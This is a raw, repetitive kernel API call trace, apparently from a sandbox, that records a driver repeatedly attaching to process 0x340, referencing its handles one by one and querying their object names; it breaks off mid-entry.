[0289.910] PsAcquireProcessExitSynchronization () returned 0x0 [0289.910] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.910] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00072a33db0, HandleInformation=0x0) returned 0x0 [0289.910] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.910] PsReleaseProcessExitSynchronization () returned 0x2 [0289.910] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff5 [0289.910] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.910] ObfDereferenceObject (Object=0xffffe00072a33db0) returned 0x800b [0289.910] IoCompleteRequest () returned 0x0 [0289.910] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.910] PsAcquireProcessExitSynchronization () returned 0x0 [0289.910] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.910] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007a9fec20, HandleInformation=0x0) returned 0x0 [0289.910] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.910] PsReleaseProcessExitSynchronization () returned 0x2 [0289.910] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff4 [0289.910] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.910] ObfDereferenceObject (Object=0xffffe0007a9fec20) returned 0x800b [0289.910] IoCompleteRequest () returned 0x0 [0289.910] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.910] PsAcquireProcessExitSynchronization () returned 0x0 [0289.910] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.910] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00072a33320, HandleInformation=0x0) returned 0x0 [0289.910] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.910] PsReleaseProcessExitSynchronization () returned 0x2 [0289.910] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff3 [0289.910] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.910] ObfDereferenceObject (Object=0xffffe00072a33320) returned 0x800a [0289.910] IoCompleteRequest () returned 0x0 [0289.910] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.910] PsAcquireProcessExitSynchronization () returned 0x0 [0289.911] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.911] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006989a310, HandleInformation=0x0) returned 0x0 [0289.911] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.911] PsReleaseProcessExitSynchronization () returned 0x2 [0289.911] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff2 [0289.911] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.911] ObfDereferenceObject (Object=0xffffe0006989a310) returned 0x800b [0289.911] IoCompleteRequest () returned 0x0 [0289.911] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.911] PsAcquireProcessExitSynchronization () returned 0x0 [0289.911] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.911] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006989c750, HandleInformation=0x0) returned 0x0 [0289.911] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.911] PsReleaseProcessExitSynchronization () returned 0x2 [0289.911] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff1 [0289.911] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.911] ObfDereferenceObject (Object=0xffffe0006989c750) returned 0x800e [0289.911] IoCompleteRequest () returned 0x0 [0289.911] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.911] PsAcquireProcessExitSynchronization () returned 0x0 [0289.911] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.911] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006989abf0, HandleInformation=0x0) returned 0x0 [0289.911] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.911] PsReleaseProcessExitSynchronization () returned 0x2 [0289.911] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3fff0 [0289.911] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.911] ObfDereferenceObject (Object=0xffffe0006989abf0) returned 0x800b [0289.911] IoCompleteRequest () returned 0x0 [0289.911] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.911] PsAcquireProcessExitSynchronization () returned 0x0 [0289.911] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.911] ObReferenceObjectByHandle (in: Handle=0x2a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006989c9f0, HandleInformation=0x0) returned 0x0 [0289.911] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.911] PsReleaseProcessExitSynchronization () returned 0x2 [0289.911] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffef [0289.911] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.911] ObfDereferenceObject (Object=0xffffe0006989c9f0) returned 0x800b [0289.911] IoCompleteRequest () returned 0x0 [0289.911] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.911] PsAcquireProcessExitSynchronization () returned 0x0 [0289.911] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.911] ObReferenceObjectByHandle (in: Handle=0x2b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007c050ba0, HandleInformation=0x0) returned 0x0 [0289.911] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.912] PsReleaseProcessExitSynchronization () returned 0x2 [0289.912] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffee [0289.912] ObQueryNameString (in: Object=0xffffe0007c050ba0, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.912] ObfDereferenceObject (Object=0xffffe0007c050ba0) returned 0x7fdd [0289.912] IoCompleteRequest () returned 0x0 [0289.912] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.912] PsAcquireProcessExitSynchronization () returned 0x0 [0289.912] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.912] ObReferenceObjectByHandle (in: Handle=0x314, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007c05fa80, HandleInformation=0x0) returned 0x0 [0289.912] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.912] PsReleaseProcessExitSynchronization () returned 0x2 [0289.912] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffed [0289.912] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.912] ObfDereferenceObject (Object=0xffffe0007c05fa80) returned 0x7fce [0289.912] IoCompleteRequest () returned 0x0 [0289.912] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.912] PsAcquireProcessExitSynchronization () returned 0x0 [0289.912] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.912] ObReferenceObjectByHandle (in: Handle=0x31c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069913800, HandleInformation=0x0) returned 0x0 [0289.912] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.912] PsReleaseProcessExitSynchronization () returned 0x2 [0289.912] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffec [0289.912] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.912] ObfDereferenceObject (Object=0xffffe00069913800) returned 0x800e [0289.912] IoCompleteRequest () returned 0x0 [0289.912] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.912] PsAcquireProcessExitSynchronization () returned 0x0 [0289.912] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.912] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f59d0, HandleInformation=0x0) returned 0x0 [0289.912] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.912] PsReleaseProcessExitSynchronization () returned 0x2 [0289.912] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffeb [0289.912] ObQueryNameString (in: Object=0xffffe000698f59d0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.912] ObfDereferenceObject (Object=0xffffe000698f59d0) returned 0x7ffe [0289.912] IoCompleteRequest () returned 0x0 [0289.912] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.912] PsAcquireProcessExitSynchronization () returned 0x0 [0289.912] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.912] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f5f20, HandleInformation=0x0) returned 0x0 [0289.912] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.912] PsReleaseProcessExitSynchronization () returned 0x2 [0289.912] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffea [0289.912] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.912] ObfDereferenceObject (Object=0xffffe000698f5f20) returned 0x7fd7 [0289.912] IoCompleteRequest () returned 0x0 [0289.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.913] PsAcquireProcessExitSynchronization () returned 0x0 [0289.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.913] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f6f20, HandleInformation=0x0) returned 0x0 [0289.913] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.913] PsReleaseProcessExitSynchronization () returned 0x2 [0289.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe9 [0289.913] ObQueryNameString (in: Object=0xffffe000698f6f20, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.913] ObfDereferenceObject (Object=0xffffe000698f6f20) returned 0x7ffe [0289.913] IoCompleteRequest () returned 0x0 [0289.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.913] PsAcquireProcessExitSynchronization () returned 0x0 [0289.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.913] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f6d10, HandleInformation=0x0) returned 0x0 [0289.913] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.913] PsReleaseProcessExitSynchronization () returned 0x2 [0289.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe8 [0289.913] ObQueryNameString (in: Object=0xffffe000698f6d10, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.913] ObfDereferenceObject (Object=0xffffe000698f6d10) returned 0x7ffe [0289.913] IoCompleteRequest () returned 0x0 [0289.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.913] PsAcquireProcessExitSynchronization () returned 0x0 [0289.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.913] ObReferenceObjectByHandle (in: Handle=0x36c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f8e80, HandleInformation=0x0) returned 0x0 [0289.913] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.913] PsReleaseProcessExitSynchronization () returned 0x2 [0289.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe7 [0289.913] ObQueryNameString (in: Object=0xffffe000698f8e80, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.913] ObfDereferenceObject (Object=0xffffe000698f8e80) returned 0x7ffe [0289.913] IoCompleteRequest () returned 0x0 [0289.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.913] PsAcquireProcessExitSynchronization () returned 0x0 [0289.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.913] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f7920, HandleInformation=0x0) returned 0x0 [0289.913] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.913] PsReleaseProcessExitSynchronization () returned 0x2 [0289.913] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe6 [0289.913] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.913] ObfDereferenceObject (Object=0xffffe000698f7920) returned 0x7fd9 [0289.913] IoCompleteRequest () returned 0x0 [0289.913] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.913] PsAcquireProcessExitSynchronization () returned 0x0 [0289.913] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.913] ObReferenceObjectByHandle (in: Handle=0x374, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f7a90, HandleInformation=0x0) returned 0x0 [0289.913] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.914] PsReleaseProcessExitSynchronization () returned 0x2 [0289.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe5 [0289.914] ObQueryNameString (in: Object=0xffffe000698f7a90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.914] ObfDereferenceObject (Object=0xffffe000698f7a90) returned 0x7ffe [0289.914] IoCompleteRequest () returned 0x0 [0289.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.914] PsAcquireProcessExitSynchronization () returned 0x0 [0289.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.914] ObReferenceObjectByHandle (in: Handle=0x378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698f5d10, HandleInformation=0x0) returned 0x0 [0289.914] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.914] PsReleaseProcessExitSynchronization () returned 0x2 [0289.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe4 [0289.914] ObQueryNameString (in: Object=0xffffe00069340230, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.914] ObfDereferenceObject (Object=0xffffe000698f5d10) returned 0x7fce [0289.914] IoCompleteRequest () returned 0x0 [0289.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.914] PsAcquireProcessExitSynchronization () returned 0x0 [0289.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.914] ObReferenceObjectByHandle (in: Handle=0x3d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698faa50, HandleInformation=0x0) returned 0x0 [0289.914] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.914] PsReleaseProcessExitSynchronization () returned 0x2 [0289.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe3 [0289.914] ObQueryNameString (in: Object=0xffffe000698faa50, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.914] ObfDereferenceObject (Object=0xffffe000698faa50) returned 0x7ffe [0289.914] IoCompleteRequest () returned 0x0 [0289.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.914] PsAcquireProcessExitSynchronization () returned 0x0 [0289.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.914] ObReferenceObjectByHandle (in: Handle=0x4b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006990fe60, HandleInformation=0x0) returned 0x0 [0289.914] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.914] PsReleaseProcessExitSynchronization () returned 0x2 [0289.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe2 [0289.914] ObQueryNameString (in: Object=0xffffe0006990fe60, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.914] ObfDereferenceObject (Object=0xffffe0006990fe60) returned 0x7dfe [0289.914] IoCompleteRequest () returned 0x0 [0289.914] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.914] PsAcquireProcessExitSynchronization () returned 0x0 [0289.914] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.914] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006990f4c0, HandleInformation=0x0) returned 0x0 [0289.914] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.914] PsReleaseProcessExitSynchronization () returned 0x2 [0289.914] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe1 [0289.914] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.914] ObfDereferenceObject (Object=0xffffe0006990f4c0) returned 0x800c [0289.914] IoCompleteRequest () returned 0x0 [0289.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.915] PsAcquireProcessExitSynchronization () returned 0x0 [0289.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.915] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069913e70, HandleInformation=0x0) returned 0x0 [0289.915] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.915] PsReleaseProcessExitSynchronization () returned 0x2 [0289.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffe0 [0289.915] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.915] ObfDereferenceObject (Object=0xffffe00069913e70) returned 0x800c [0289.915] IoCompleteRequest () returned 0x0 [0289.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.915] PsAcquireProcessExitSynchronization () returned 0x0 [0289.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.915] ObReferenceObjectByHandle (in: Handle=0x514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006930a640, HandleInformation=0x0) returned 0x0 [0289.915] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.915] PsReleaseProcessExitSynchronization () returned 0x2 [0289.915] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x3ffdf [0289.915] ObQueryNameString (in: Object=0xffffe0006930a640, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.915] ObfDereferenceObject (Object=0xffffe0006930a640) returned 0x7ffe [0289.915] IoCompleteRequest () returned 0x0 [0289.915] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.915] PsAcquireProcessExitSynchronization () returned 0x0 [0289.915] KeStackAttachProcess (in: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069851840, ApcState=0xffffd000ac0cf400) [0289.915] ObReferenceObjectByHandle (in: Handle=0x544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000699156c0, HandleInformation=0x0) returned 0x0 [0289.915] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.915] PsReleaseProcessExitSynchronization () returned 0x2 [0289.915] ObfDereferenceObject 